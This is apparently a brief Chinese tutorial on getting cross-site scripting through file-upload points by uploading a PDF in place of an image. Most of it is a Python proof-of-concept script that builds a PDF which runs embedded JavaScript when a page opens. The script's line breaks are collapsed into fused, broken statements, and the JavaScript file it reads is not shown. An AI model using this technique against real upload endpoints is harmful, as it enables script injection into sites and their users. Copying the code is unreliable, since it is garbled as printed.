PDF如何XSS

简介

在上传点时，如果上传不了图片格式的文件，可以尝试上传html或者pdf文件来达到xss的效果。上传html就不多说了，下面来说说怎么让pdf弹窗。

操作步骤：
环境准备：python3
需要准备poc.py和poc.js
poc.py内容

# FROM https://github.com/osnr/horrifying-pdf-experiments
import sysfrom pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArraydef make_js_action(js):action = PdfDict()action.S = PdfName.JavaScriptaction.JS = jsreturn actiondef make_field(name, x, y, width, height, r, g, b, value=""):annot = PdfDict()annot.Type = PdfName.Annotannot.Subtype = PdfName.Widgetannot.FT = PdfName.Txannot.Ff = 2annot.Rect = PdfArray([x, y, x + width, y + height])annot.MaxLen = 160annot.T = PdfString.encode(name)annot.V = PdfString.encode(value)# Default appearance stream: can be arbitrary PDF XObject or# something. Very general.annot.AP = PdfDict()ap = annot.AP.N = PdfDict()ap.Type = PdfName.XObjectap.Subtype = PdfName.Formap.FormType = 1ap.BBox = PdfArray([0, 0, width, height])ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])ap.stream = """
%f %f %f rg
0.0 0.0 %f %f re f
""" % (r, g, b, width, height)# It took me a while to figure this out. See PDF spec:# https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641# Basically, the appearance stream we just specified doesn't# follow the field rect if it gets changed in JS (at least not in# Chrome).# But this simple MK field here, with border/color# characteristics, _does_ follow those movements and resizes, so# we can get moving colored rectangles this way.annot.MK = PdfDict()annot.MK.BG = PdfArray([r, g, b])return annotdef make_page(fields, script):page = PdfDict()page.Type = PdfName.Pagepage.Resources = PdfDict()page.Resources.Font = PdfDict()page.Resources.Font.F1 = PdfDict()page.Resources.Font.F1.Type = PdfName.Fontpage.Resources.Font.F1.Subtype = PdfName.Type1page.Resources.Font.F1.BaseFont = PdfName.Helveticapage.MediaBox = PdfArray([0, 0, 612, 792])page.Contents = PdfDict()page.Contents.stream = """
BT
/F1 24 Tf
ET"""annots = fieldspage.AA = PdfDict()# You probably should just wrap each JS action with a try/catch,# because Chrome does no error reporting or even logging otherwise;# you just get a silent failure.page.AA.O = make_js_action("""
try {%s
} catch (e) {app.alert(e.message);
}""" % (script))page.Annots = PdfArray(annots)return pageif len(sys.argv) > 1:js_file = open(sys.argv[1], 'r')fields = []for line in js_file:if not line.startswith('/// '): breakpieces = line.split()params = [pieces[1]] + [float(token) for token in pieces[2:]]fields.append(make_field(*params))js_file.seek(0)out = PdfWriter()out.addpage(make_page(fields, js_file.read()))out.write('result.pdf')